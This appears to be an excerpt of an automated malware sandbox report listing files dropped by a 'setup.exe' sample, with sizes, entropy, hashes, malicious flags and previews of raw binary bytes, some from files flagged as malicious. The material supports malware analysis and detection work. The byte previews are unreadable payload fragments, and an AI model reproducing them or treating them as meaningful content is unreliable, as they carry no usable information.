              Preview:CMMM ....(q..Kva#.j..@E.2..7....Yo.....+...P..^zL(.=6}.!... .....xTi..,_.Dd. .};..-..f..>w5z.n.L'....=.v.'.....j............k..n..>}..w.G..Q..O....9o.....t.Xi.ZkD.-....x..'.......#..f..i%..g.4Q..Z/.uB.i...+........F[^J.....gKI...?. @.....wl.<J.....7W..Q.?..".....|VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.287110900692635
              Encrypted:false
              SSDEEP:6:A7b3QzxQv7sixQph5+g+gB+iqihDXgHipPiEsBdlrnky+u8LuJ/GjMzAZfYqfz3Q:A7b3Qav7smivEnCpqEs/6ypT/Gj/fYqE
              MD5:7DD969932B831D24BD5BA4C315FF01B6
              SHA1:7AC3BD75E0F5C111709B26592AB2A497B8C67366
              SHA-256:EBB9B48AFEC1D6E25B8E39C76F6C8C68D872F9B41DDF0F295BB9A14007EA9424
              SHA-512:BF97FFE5500CF0C6D67729ED986389B3F6185BEDA04F6B65230D7D1396F3857B0B105FA82FA2583DCFCB00B7DCCB7265810D087D5EEA8E7146BF1F894FDCED7A
              Malicious:false
              Preview:CMMM C.m..>........>.d2.D.......{.pt.]5......F....-.K.*.._..9;..dW."z.....y...9..........9....>..QD.)..8...%.....!..xs....."......./.."..L..A"......^.............24YNc...^.....s%u.../..xD..W..".3a.D.....Y..E....}....Z7.I.^D@9l.%.4.8;.|.p...c.:.!..r....T.|.\.,(z..\.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):64281
              Entropy (8bit):7.997188214469122
              Encrypted:true
              SSDEEP:1536:Njzfwi0qWR015Ptq6Bl5Z3KIBxw6fn5vhVJf++:NfwfRm/Z35i6P5HJW+
              MD5:121D277FCA38249D87C8B0967F8B4F6C
              SHA1:231AA8D20E4CFDB277D3C1B3AC0869AB6BD1D1E3
              SHA-256:06B12FAE0C02DC6F21CDE89BA7F59DCBA1D987150265A6E950832E53F5EDC2A2
              SHA-512:B4FADA01EBD86E8BD41AEB1D706A520CC6FC8DBEE98447C2FD27181F5410802EC06585BF42E7E83CFBC7A987E01A5F41AE9355F374BD44C6AD509D8E391E3510
              Malicious:true
              Preview:<?xml..-.i.........W1....e-}...g._.`..Q,...hWB-....W.....a....N.K.$:....33.5s..d...hP>...3......w2d..*r.>Ib...".|<.6jw!Z.....9 p..Mi,.*M.]P.....<..p(....6.3....4.C-..#...%..`.....[.t\.-....a..ot......@`XVO.b.}.<..1i@_...U....~..7.S...S..w1.?..q..~...$k.m7.Qx.D..>i.MV.....{:....l.Z.p.";......&.5XOq..$..b.....`.7....y-m......p..n......R\.K.'.....E.W..z.|..OR.,".u..f.a..J...S...Tp..l0k..U.yL.i.....a... ...P[r....X......T..%+.L....Da.oO>.q.. .....!).&.-....yk...j..).cR.HO.Ox...> .Q...=Q..5..d..z...Z..$.e..e..Ad/..u....O'..s.E...'.......j..a3..z.h.W.3..2..<....Hu..Tmq.6Y.:.l....I..R.4`....gm..A.?..1<.....+.....\....;....{.].K../.p.V4....".7.qR...j.9.V..1...c.lkyx).../.\<z...c.>.r2(O..3....x.J6............G..$...An.>...6.L...=...Q..?&....F.b..&_{......A...QG.skx.....?....2.!j:..n..~2}.w...[.gs,.....V.=.u..`..6 ...4.....g&..@..A...].1./...C$..R.....9.v7.g..(....LX...i...w..)p}'9..Y..d..6../1...>.h..FI.2.-..o"..`.o......D...p.O....R....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977245490321764
              Encrypted:false
              SSDEEP:192:CgZBuUFR6LYvl4V6AaTtAgoRerFrw+Zfl8FDfVX5u3jHVgU+zTuCFK:JZsUr6Lsk6TigoumFDfV+z2zSCo
              MD5:E98A9841E29F7675BC228E5168D867BE
              SHA1:93CF98FFD037B971A231BD8569EF959DB2E9FF86
              SHA-256:FE64C5F42D0E6ABE9107862C92EB3EE37A425E8077B841AB4FB8F02C03F3BCE3
              SHA-512:C8AAF47559350829052B9DAD320AB6E451363F670493F2B35F50DD97A1D69A5337BBAF941F687E4832FEA07DF0B50B1386077E2FB7CBEA2F3613E1DD70796E93
              Malicious:false
              Preview:W......L..8..ZWd...W.(.Az.j...e..]....+2.....Rcb3....L.;.......NT...$....&....VB.v..}.._Q1..mK.T.......... ..W.67X.5.3...<4I.Yg............Gc.Q;....5...#]Z.)../.>..bUL~...R...b.Y..P...^h.HN..W:.evY0p..:.qZ[.....rr.0.p...}..2....X.6f..........h{....H.z.#D..s.2LVZc...MJk{.8..E.&.{../.L.w..AH....J.k.0.E....*.1i...w....c...Y(.p.....I.....)...#........T(}*.....\..$..4......K..b.k;....r....{G$...B...n.e..x.....0..h/..d\UX1.5.JvZ.sr>.i...h.e.....]H......xu... ..=....~.(.%a.....D2.c3.a...NU,..QgK90.].hC..g+...?....M..9..D............Db l..0B..T...~..[&Y...^..Q..@...v...V..-._...!...PTue$.>2.klL_.......V..~..D@.)u.r....EW.j.E..>..FW=L..V44.S....}..Z....M.x.H..8@...:M...^.w.?...."..2.......sC...x..W........}.,.....}&..>#........Z.)A1d..wL...&..z.f;..)`.f4l..u..o.......1...H..`$C...0..2M.....K.M..T..D.v}U(.O.r.c..G.66.&..9m..WN..U..N@]>....Xr.[.w..".7...s$......|./[&X..[VRj..|....T...46.J'....V.c.....5..1..#r..../.5...VQ...[k&....K...>I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.787484999169396
              Encrypted:false
              SSDEEP:6144:sw6MEqc4hcmudr20TP0AIE+5x6tToP5tXbltsR/IJ1S7EAe3sw1Xq6EPdqXfiWWy:sU4mMsD66UIB38qKhq
              MD5:D8F90836A8B1A424207A236114F95208
              SHA1:2F2891A6027E4F084952E8CCE81011C08C0D744B
              SHA-256:07588D461DAD38156F5FA8546E03C34CA95EE600FC5DAA4B1C571FD9B425A2D9
              SHA-512:4A23700B7AB9BF29EA572E9AFAA51A375BE8D65A642A55A4505881BDAD23B20D0DB4B4E2ECAAFCB3BD0041BF3A4CB8100C02CE5D863121130DD1FB2CB1B99C24
              Malicious:false
              Preview:..2].u.......G..?.y....... ...S..?.^..........,zT~...*Mt.2(}t.d..<>.*pj..x..0.Y.o;..%.NOM.J@...2...G.jU...W.t.u..B?pA..^..;.....5...l.'7..e.7J}?./p...24....vXO..`.7.W. .....Im....z.....rl...Aj.)s....F..H..n....KC9.0..^..zH.|.B..2}S.E\...l..9Yl.F..(.>p.....l...I--...i}V%..^F...'pI..3.|..D.Qt.*..I....o.....AB.\..b.(...}..8.#l@r....7n.,....$....n_5..0..!...Z>.4.yJP.gh..W..p......Cq).t..Bh...g..........|.`.......'.( +.hy.hZ..7...e.E.....e...p.Y.Ml.n$. ..<8.......1.4...S<VY..=|P...!.........nQpe...+/..]my.0..1:F4._......MV...n.vj.!....7...F5nd.z..P..{#../....y.....h....s.0...V.1.$...^,.......z..G8..M..Q..js:......o.\......4..ST..N.X%.!.5.:..4z.eg.i$p..w.....a60.D..|..}.P.)(~T.X..]+r...*.x..O....A..$0.S.A...9.......\oo]...Z=.......{.f.Yd....Cv.s7.J7p.s...p.D.....f.HC..../...[.UD......r3....H..xv.~." .a....I.....2.\.c0......:.^d.+vb..C.;~B..b^...a...A.|O.4.x....X(Cb3...........Qx.e.*..B.U.T3...{......%..T.-IV~e..pT[..g...9...7B..../...?v.|^....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.207974523809868
              Encrypted:false
              SSDEEP:6144:2SX3ZYfOknfK8nARF9Z88G3m0C/ntYY3X:2rvfGZtG3mNftYYn
              MD5:3FDF2604491180694584AE5B7A2CFDE9
              SHA1:05186BBFC5A91AE3826D6E5342F7C34CF1A9C27F
              SHA-256:C413F6493C11BA0DEA446FE218B6D2E08E0AADD942ED4F4266C386190353C552
              SHA-512:BEC0959BFDA58DF3216CCA13CB01A8382002DBA8D8C77331311BC65A484D1AFA91D7B7E174E798955E517BBCD087AFD079F719FEE5B3B8A24B56A3158D158147
              Malicious:false
              Preview:.......3.s.)l....HN...C.......1.9Bf.!..*..yt...w..c.1%R..bB........Rr..+E.J...z.d..K7(.q..w...k._.U.3..2....{.m..y,.u.\...y..B..'.`i3.[.Q....R.OlZ..<....E.6Zc.....r.N....1..q:93Nz..6T{..`..2J$y).4.....U..(..]l.\.YW_&.Y...\.....r.;.8...d..L.......@ ......R...Di.@.T.....|.)...J.d...&#.6..7u%.$.q./.B[.4.n......5..M.$..L........{&p...o..h.}...[M< .......:.."l$.a.....6.T.g..N.}gp*.'g%..s.-L.3..i/.k..5...m*+.....,@.....|........W....e....8:......Y..(..M....D..9..Z.7..j....V(=...).........d2K..... ..S.U..MOL...Z.bJ.1.+H......E.r...)..b..>dg....j.k.6.5....I.G....oU..>.+..6%vP.....z.......`...o..9..M,.i..k.v(d.v...C.p.Z..~.<.....2.{.......5.W.._...8..[..$...v.....v~...fLz.cy.{f.-..C...$..G.se4.[.....M1......3Zge<....Nkr...0...6.....E.'.R...0.%e;Yvu.q|..HP_u(f....T..v.(.....(.....`#;^E.}..D....../.....d.....: .n.K3{^mE]).G....U..4...,.+.1.3m..~Y.....14.2...`.....y..02.....O......,..|.o.E..Lj..o....]H.^9..P..X......l.....b............(........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2082316364807957
              Encrypted:false
              SSDEEP:3072:T8GfMdD/DthMqSeRZARpsULMwHOxtCRKWU9198oJM2N1U:jMdTDXMqLRZAReRrtCIWq3C2Nq
              MD5:D5669C6776F488DEE923CB6736F39700
              SHA1:FCA06C088E7633DB81E737B0C3C40AF4584F6440
              SHA-256:C76A8918FA79D970D0B3CBF5DD5D3DEA061BF9B25D700531B25EFAE6E4C2BE53
              SHA-512:95A82ED26A73B0CF69B4C0B810AC4EB2E74F9B9C9F9ED92FC16A74FCC780C24E5BB328F8A99D98FEAFF8AD37B470F82EFA9543E0309156F05E077C1D88B0E06D
              Malicious:false
              Preview:......g...6..a.E.j.)m..%8.~..B..9....~.Tz7...*..).;..!~. .....~'.NHHd*....V........,..^.....{.A......#uW........)D.|A.Q...x'.g.$R.5>....(...X.Y.#.R..n..V....z..(..,1...R.'..b.~.3..>......E....lu..15..QdL..w.Z........;h.5..ZQwxam....f....u>.>.Tj...1...G....3..}..C.pSBu1.......+..<.?.og#.@v.1.1U....a.r...CZ............t):....:P...J,..Z,..B.W.l/...J.%...tA.`..../.j....5.O..T.....3........-..p.9.X.Hd.uz...6..FYI*.m ...m]..fpwk..L..-.y../......r.x..D.%......=.p:..$......|3.....B..*Kk.y.....*......X..UO/Z.B/...OH.....y.4....."..7..........\.Zc;......vp.Kc.............J...Y[....@.u.;7..+*>...n....Mu}.e}d......s)~...x8.z.8...........Bf.g.P....d.-x.*..&cG..`.O..3.6..4(.).....{...+.TV@....G9..=}.........z...4..gXm7.e[..3.z.u&.....o.&.8.<GL..l....%..Dv.:.]o.t....=............3.H..}.S......|...O..a..\....F....X.g>O..0z.....l&..]_.K.uw...%...D$?M;.....v+.@X..(.P.s~0a.z.Q.i?.{..K..O:a.U.N.S.BS......9`.l.V..h.....1..Z.ob..R..... ^4.S.....#.g.T.I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.59268889632016
              Encrypted:false
              SSDEEP:6144:VfN3z8j8IQH0lo2muAsgrFflsvBxvqcnfxngsHIN0HTcAd+b67RG+rdsxQnZ:d93XH0l7mu3gx+/nni+Q+Z
              MD5:529BA41961016B7ECDEF7AD4AF6E7A5D
              SHA1:65065DC41E3911DB7F2F81E0748F8DFF608C345F
              SHA-256:FE4D06F85BBB9B38529AB539C7AE4B11BCF07517DB331E4E5A970EC122D45580
              SHA-512:FEFE42C7BADB16B13A849365014E24A421D1862269E1A339A39ED4D945CA75396970D03FE354F21083CB27C986D8E0BD774C0DDB38D6CA400BD7C54F9D9CB9E9
              Malicious:false
              Preview:\..............C ..W.......c...{..;..k......9.x.......E..8Q.EB.!....(...Nh..ps.W.g..+.Oc..W...n....Z...../n4.G...>..../.z+[F..E\........mZt.|.+.ho...F-.jSU... .{...(....Z[.uUR.|^y33sO\.'.>..<T..k%.v1&..a....'u.o .K.8...~..../.=uX.. p...).v....Flx...2k.A..<..j^z.`.o....Yt.q(..;....%.....@..P.1..j3(..@...F.P.1.:...c.8.,Lh..w..4.s.......Ar....zc...#l.@9..C>J..:....@....o.J.MB.......k....h.b..+..gT....7.X7...W...$.[...o.(..R6QS2w.......h..4.....h...Q.U.....H..;...Z..zS..1...i...4q..q$.E.5.y@.od..T....-..........(...9...O[...j..2...N..y.P....>.E..P..J...2v*..9........6..![_.q5.2...sDl......J\.)$X..)...=f..y]..JvXL.......F{.... .=. V...H_.U..N.t.S.k..y.R.U.G.D.c...yR...@{..;l.f..93...1.V_C....kD.GM..@...Q,.......|....T.>.<R......7.u.y.......?=*Lb.F...Y....?.C..*(..7~..........jA.g.I.qC~...n.HH.?l........g..F.5v..U_.9....@.-.X..]..9. 6u..@.....%b..&.m^...N.|..........Z..M..>w...1!7....p..Pe/........;....1..TTA6M.:.#8..3&gy.'.G.B.....!.....E(.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):20346
              Entropy (8bit):7.991276300685047
              Encrypted:true
              SSDEEP:384:nojzYMoifDFWo5p6P0f7EBOfXvnv/VULqYBsd3Nw8qPNfCrZggFrgkrRpob/:o4i8of6PqAcXnniLxO3NNqlo8IuT
              MD5:22F1828571E2842DE3E530A90DFA069B
              SHA1:7F21DEAD31A0E59567A30872584667C23975287D
              SHA-256:3174B18158F04451FB20ABD787232D1D4E51CE97680DC368884516396F3191F3
              SHA-512:35FFA160FC9FDDD800F698EC6AD3E45F2A1DFC35ED1DA753C15ACA726479755025E779D63F57A042AB1500EBEB724F11AE26C4F5121A0C4B4205946252358C6A
              Malicious:true
              Preview:......i...X....8......&......v8..v..o......+.y..U..--.T....E...F.......z....xaH.....i..Q=. X?......x...c..o.......*f..|..%.';.M....r....d..`....%./..{~....[.....F....'...j.b.r.,6.l5.:.z.T1.;..F.....w.......A..l.y.l...F...s`..;..U.4.....[f....]n.......U/......5U4l.mW.4..~:7SoZQ.zn...p......E..48...@-N+SY..y..e*#!.....;6R_.....^._]....6..\..rq..B...< r..?8I......EU.C|p..F...=]..T.H.5....].XtB.B.1ME0...W.d.&......f...$.\..y+..l.q.].c(..nT.m.M..o.0..~%....Ta4.n.j}0.hJ.f.;...^....c.!...Z.}.0.v..Le/.~.....{. .C.&(.s.sQ./.0..qrS.a....-.f.``..z.,2er..a.....!U....n.../r)....>j..7).|..t...;u..Zl.O.U..Sp..............S...h...N$..u..D.y.-...w....S.A.S...%^^Z.n.F.....;..!s............+r......!."..p..q......I....w&y.....Y.>.\*U.t..?..B..P..@..l....6..d.b..h..7....-".E.7{...W...\.....iT.!..ya....t..I.......m- ..>.g..M......8..xf\...H.%...S+...'.....$>.....f=..Ys......|....T.....T..s.....L.A..1..l..E.SU#..........j..~.35..o...a.xfr..Zp.2..+`dnhkg.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977934107140513
              Encrypted:false
              SSDEEP:192:LHQHxum+E+ZlwawJc7S/nrSeKY/wa77J5Pzt7/2ONLZ4A:zQHxoVl3wImFKYd5zt7/5tT
              MD5:F7C036C0838A04BE198B5616576F192D
              SHA1:8E48F89839149A12A0815196D139366C26B0EE95
              SHA-256:513DE10F06FF5A8238347C62F7E52016E79A179E06A9AA288F1BC4671964E653
              SHA-512:FB29B66A74CCF15403B6D4AC62901BB74944AAC9DB90356CB781792CF7DDA12F596217A41D6B7363DABB2F4F527CAC75E6600164B443E5548FE15BAA9C1A4E6B
              Malicious:false
              Preview:regf.Z..."".1.\. ...j?g..P.......q.+.W...wh.?.)\./u+..."..je.....m.,DC\..]......FJPPK...#Q%.........7C......+73.@...[i.....=O.a\.N.......%bq..C...C.G.#$......}...%..?..Y..{...yo.?.2....V...{9u..l..N....j.pX.%.`Q....."*.X+....;...-5.2.g..w0... ...f*.L...Z..[M.s.y@c.E.B7....(....ju`".....S1....x...G`.Ci....'P`..M...D..48D..~...&*........(....J..QlW,..I].s.....F..... .....J.jnX.F..H.Z.r].&...U)R...J5.~...n....!..#H .J.........U.g...D..^..]..A..v.j.pb........J..c.9......e1W..N....;a.%...q=..;H.....r.S..K..uu....RE.*....e..\....u.FcA..w)..Tm~B...$..V..?.U...pA....=N........E.k..Pu...o.c3...F.qM.G......(..A... g!..+@..j....gy.n....}.vDI..I..l.[. .F.t.w.%.xS...)pM....-{....Ss....D..on....ySY. .R...R7.....S.....V....{.p).........e.......&#2.C......Z.......N.aS6!uw.o"Q*......*~.AY.....*.b.....0....P..G..7.-h*.r.V.W:...+YB.KA.......H.t.P.k.0R_..ov.}]...Z..e.2..V....3.;..M.e..Zo..4Pr..<..{.Q..|V.G.M@.*M...8R".=Fl...."M...&......U9.(U...&.Z.%6.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97874440053921
              Encrypted:false
              SSDEEP:192:97nkCQsMbkH2pVU3xGCyQ7U2nsCObHmGhDVDWDHsRKNnax2h:NbQsdfBTQ2sX6o2MKNnR
              MD5:7386198E40DB682295D60CC50E46249C
              SHA1:C3AC15DF539A6AB6D9A48F514C18EF02857A9550
              SHA-256:B231EBF334F428D17D57CFC120FE82EDBABEA77A55B6A19466FB0C3105AA61E0
              SHA-512:BB21A9FDF7FEB99889D06D7C54775E2CA8B1BE1D778E80122DF5E6A6D02CF886921733E7BD1493EBBFD13F1F3E30D8E4B65BB767C9584E624DD9749885948D34
              Malicious:false
              Preview:regf......./H..Z..I.....w.x*,.....@.&u..&V.kaRc..}.h..RPoH...$>..I.h..ZL..PN..0/L...h!".xY'.&4.N....E.u.n..Uya.....f.T4...^..2E[(..kh......+.x6...9t.S..q....#...t.}^cT.J..3dpc..N......T..=.......o7.+._.....VH.]......+.*.....z..=9.'F..K..%(a..z>.D..F.l.1.QWZ..G.4...&.9)..{.H..DU..It_%....B.../..J.,.......I.Zz..K.g.PL..t.....Z..\?.|. ..K.%Y...d...Y..c+..;.......,.o.dp..]..VR.6%B.....B.G#..5O.8s./.9$ni......#.M....]\uU.....l..N.|.7.C.....5T,..w...]......S...)....Mn5w3...7~.Uue....-.V.Z...p.R.$.O..>...R....cf.... Y.Xg.....;t.Z._..Ds..Ww...gU.Ijw.<...G..U*..<.{.....;.....U2.y$.^.......Eq..e.......;.x.`..&.H.-....w....![.*3X.'.Ug...E.......$,...d+..[G.^i.....BVMa..xE..W9f.}.....j..M.....WZ................U.Kr.U..t....E........^t..\j.Cb...A.......l&.4...^...feMc.yT..b...K.h8...m.xYeR.; j=...1.{%D..h...Qs.Ld.\.......G..u.Y.Pqt.t...Q.Ym..6.g..>l[.U.tr*3.l..K0#....|...s.x'..H0..-._...&.[.I.A?......j.b..H.U>......Y\.^..j.F.0Y.s..4g.!l......6......%..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976825936582029
              Encrypted:false
              SSDEEP:192:fTm+wZ3FgJqAEOs+BW5OTq/HoTeP0ckdlOh5xoTwzGcb4dvAxRP:fS+2SEOB89PL8lOhsMF4OXP
              MD5:937F49F1ECB25FFA408154E8F4B52B9F
              SHA1:ABF607E129CFEBA8586229595B5F4F7E2FA2F4F5
              SHA-256:483A79FCFF01A0357552A83D186E9A6D887CAECB622BA4A17F0BC93D6F3C12D2
              SHA-512:61BAD7D36D3EF39BE8D020C51D900152811DAA299CD657DF9F641655E9FE0C836A4CBD52E9DFEB05392A4D2427D4BE80C8E709922E6D5386D811E16C4AB175F2
              Malicious:false
              Preview:regf.5..p=.........2.p.Vc.I.ds.[.m82..H.b.5.\..p.<.n......L"...q...O}.tDK..X...=.!.Q9r.U..e.!.>.o.1.>.....r.!..%.pG.=...0...M....N.>...o......k..g..+.L.!)1...k4S{;2...~..4..0...ht}..OE.S...f..\..m.I..M..i..z.v.%-d.^NN.....O.ya...K...\....u...D..<|e..._...e...6..Q....xr|..D..+..6.|.(.U?!._{F.....q......4..Z..%4W..>...4..W..z.S.r...==..".`......5.XQox.......%w..F...R.}_..I.I...a.."..rH .!.R..I6k{..KfM.\.O...$/......\.?...l......W....{...I.."z..@...\..c-.P:.......K.^4..yzi.....;.}(.$..{.'....+W..3.%..G-B..(.]..T:.>.........s.)...,M.@E....g._%sZ.......7..{.......?J}...,.g}>;.!4...D.2......vn&.. ..._r..N..S...F.r,......2.....o:?.B ......=1...S.6...4.....?$.8.D..?.WC ..x...ro.}..$!^...Cr....8;$8.......8..4.v...+F...L(..>..%K...z!....>.j...*W.,...<#.C....u"c.p..K.^..|i..a.....O76>P....(.7J.Z.+Zo.....1.j.w.'.D.....Qt.\:5..;:....D.g........q..".+./..........(L.'..N.y....p{..-.}.c.]..N.U....../....=.b...X.tYJL2W#..%E...{.p...d.:...j..$=
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9781543921916835
              Encrypted:false
              SSDEEP:192:f8GFgr+8Qekalfw4oTzR6zJHnQl2Uk6X9sbTlCyBN:f8GiiVaxw3TzR6zJwzmPwQ
              MD5:19EEA9E65DF6C98E6BFD052C5EAE80A4
              SHA1:26E359E197D3E1C3B60AFE3857AC76D30A148A2F
              SHA-256:FF14D98BBB1C2116E56944F3140F29E57BECA783A4F808BB2E3BE95A723541A8
              SHA-512:5429F5802B56AE4493D45C16B6637026AA5CF42982DF5D932E1227F81C9E158E1FD8F411473ABD26D9ED9046EABC465432CBE2CE72324B6C143FE26D7AA2DFBD
              Malicious:false
              Preview:regf...:...MC....CV.u_.pj..e...9..".R.8..*.y*..w.....pG..9...yB.!.....t..P$...GZD.iFz..Q#oM...nX..B..U.l..~.R......LI...]Zj..J.Y.R...&T.8..*.PJ...F>.X..0&....d^P...........E...Y..(..6..Z..O.X...nu.......n#.n...g.8.SM.%.<..0$Vk...m.n}wp........|.F.&3^......F...%..bP.....:'...5..:......P|.".k....w..6C,"q..).....yLtj......D..H`....C.}..I..h......N..r;..,..X.......s$\.;".H-.3'...&.z!...8ta.yf....#..P...o.....:.k......`.....=...E-./.....^..9..={...t...@a...M..`...w..,J\..b.{....*.......T....(....H....q7.BM...D.J.,w0&.v..%........./..q...Y2..Q_/. -!j.w.<Z........?.....'..U..2....*{...3'.^....L.....G...a.$...^.js..r........G.t.kv....}*...h.}.XF.|i.I+.r<.....K(_Lu.k....p.f...G#a.4*3H.....[....c.|...3..L.3xFc.)m.D<1w^..X>[...n.t`..!...f.cxc.....B..s>..v.Qf.(k..[AF.4.`.4)=.....,5.U<.W.^Z=.>..S:...G.......i.....q... ;.I...kME..f...%.Jl.....-FV.<...qd.W.bk...@...#.bI.m.....b|......'....i.T..F.&....5T...........W..O`.{..:A....-.5'I.Z?...h..._X..Q.C.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977285170197637
              Encrypted:false
              SSDEEP:192:fqS+muLmVgjuVDytL/L4tSBUSrGHX//9QWL:fCfLmeuVOtjL4tS5rgv/95
              MD5:9BC3F6863774EABB003D830E06D46C4C
              SHA1:D6FBAC499F00CC40A3B501735C31CA64C7BC23D3
              SHA-256:C015CBC86892103E11B0A43F75A183C47DCF73F3B9E428B63FC8943730ECDEE0
              SHA-512:8BD0214CEB50183FBB494483BCDF93E515EDE0DC59AB5CA40551E373AA137B9650FE648686DB3DFEB4B836616AEDC8FD4A350E41E24D4E4B2258ADE76748A21C
              Malicious:false
              Preview:regf...e.`q.a5l....*..?y.`?.>-QmZ.=.f. ........ZJ..r.U:...C...!.L,...'.\.#.......J.$.eU.....XS...s....Q...-.]6M.}....=.=\...ye.@#.....p..c..T.%Ky.0.|.(\b..%p....1.<..x.4.P..h.mp......VB|.7..(..s...y...`...N,..h^.E...['{...2..Rm....L..l"Q...C.(...o.rv4k%....._d....N^.....<.H .....2O5.Ma~<n..~IJ..e.1...$q.[.<.....I..?cE.&k...].\s....&y....d6^..d....V.DQG....s..~.[...Q...$$dZ.+..........Q.F.....Y.f..9.........#C...'.?.H...7.../w....(#M....G.f$.......&.Vi.h.6..m.$..1%.]L%.........B..W^y..u...f8w..V(..,.T.F.Q........>mRj+H!..v.n..Ke.......I%.>..=.]....H .......d=!.\....B.....z...].f.Na8.....jH2.o=..m..cb...T.o%..H3.Kd.m.)..m.r.........jg.CI..B7j.+wk$..Q.=x.+.%..`..Q.$...3.A8........5u..f.V}.......rew.B..f..`Wt.....0.**'C..v'....I5.C^.....J|..5.t.3uW."s.........r.'.>I0v.+U[".v..}.f...;<3a..pZ...:@.l<.....G..G1.!.#uC.'..>...%......B}Y..pl...%..:..M.W9...C....W..c7..N....,...K.\....[...]U...).x..{E9pV.;..n/MH.z.....#Z3.&e/..)CfsH.8.R....Z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977626897687619
              Encrypted:false
              SSDEEP:192:bKUJPt0XmG96mOny8S3NmCiyVYWXA3TSzOG:2UpiXmGAm4F/OYuA3+OG
              MD5:8DAA33E5A418F02EA2E6A4E4E05C930C
              SHA1:70FA2698A3A635A2C894DD87768991349C0FFC45
              SHA-256:3DE8A3FB37DB2E5F4895B4308BDD78EB259A4F93299452CEFFDA9FF14BCC399A
              SHA-512:28317B353BEE135511F130DFA88C2616C7A0E14A7C0B666579DCE5CC5095953AA6FECF01D0E8EACC36A08E7F85F5BAF85D92E0E285BBEF332648A239299BD6F8
              Malicious:false
              Preview:regf.{....~..vA.{..r..$...C#.....[.U.]....d'.B.E..a.........'{5b.3]^J..c..?......4.....+.M.xe.3...f`w7..E...%5....7>.......&...:...h.e..CV.t......a..rh.W.........;!q./.[Y=r.6^YO....B..mG....".i..BE...!'@4..*GRO.Z._...:.J.Q|.......b.@1..:7.f./.2.8...ws.M..{.N..G....Y2@M<.._...2..q.6.....q.p3.z...2.b.."}..l.......j'E~p.J.Qc.wv.f.`3H..f|.$wIS.(G....6.Z..KbK...VK.A..~=.q./.8.g..y\.y"."}.yp..<.2.>.MQ.DON.>..J.~S.qOmi.)...p.....(.D..a...)...5B,.X:6v.oy..,..c..K../.I.j.P.|cm?...#..<U...@..4......^...sY.5{.....vO.!h(.Y.!.`7...z....Fh.[.w...............$Y........=..Y#...~P`.....P.)..6.8.o...H...............A\.S..I/8...9....>ez..Kmu.9.Y)..O...T?.{...6*......B.PB.SoG.....(3.,c.vi...%KFx.Z..>+hN.....jc.....b.........!F.]._..n.=G.g...f.J1>^..BJi.Vf..c-/Z...h#.QUeq...j..J(*.A.tGn.I...PO.oT.@..R....`..N..e..W.......Hxn...n...&...].1.%..UL..BO....#vom.).g...Ya..l..L....@.."...`?..7....K.k.x.l.I...|7o....F."1G....'UN.gz^....:.}*.:........w
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979360293378676
              Encrypted:false
              SSDEEP:192:D1TGdTw/g1w14X94jk28CsYot4CDBbiBrSEqqrJK+caizIczS6U:Dk5mCw14NU8CsjtDBbYlqq4nNzh+z
              MD5:2C97B41CA7A1BC958312043528048052
              SHA1:A2D74B514DB30205C1FFB385414A8516CE7E1417
              SHA-256:71A50A2C0B58762805F902004965C9E07FACFCE39A340E52C4A90617099CF8ED
              SHA-512:8EC2112546C1424561C7EB521D0E05BF81AF0FBD7E55190A03016807488A5AF767EDDE852D5F5EB9B041AB9246CD6BB2965ACB0412201B9BD51E629311A4A897
              Malicious:false
              Preview:regf.......||..2.w..D.1.c.....e..$.o..{.T[{....".a.o...A.}..t.z..%.......<..!,Yf.J.X..M!....~..v.mh.d.q.&..lJ.'P*.....X\i.QqIs=@.]......b.|f.Z.S.3.ZH%}...w....C....\..1..A.........h..k..y.......Y*@..#.\..!rk .^c.....Nn....&jy.-;..%......?..7.o2.~$l....>..h^Bf...K?,b./^..6.An9...e....:u,.b..a|....E..&a.......2..B.._l..E.{..N...4y.Z..<.O .v............<EU.J...2n..*6........<E....2.......4ni_...Y(....t.3!..pb..V..J......8...jK...R.K.,..R...2.c.....d,........8.....j..J..$.)..a*..k....[=...#e.....6.^x.....n......F...................Lb......m._.,S`.....rh.......o.,.....H...6...f...n`..K....b.Di../@.E....U.W;.......L.#X......8...%../{."VQQT ...Q`..O.Cd,....h6..-v..ug.t......J..\V@N...".z......o.$..j.......q........cE..rI"..e..8'...|A..j..d...8..I:.X.*.9.....{'.k.D.p7.+I......b....l.......NY...../R..A.^.\T...}.g..,0w1.... ..X~.H..e.D....$..).z9+!.h..a....p&F.N......WPn.....w.....#M....^......GK......O.;...9.?.l.j0W......M.I".%:.:....
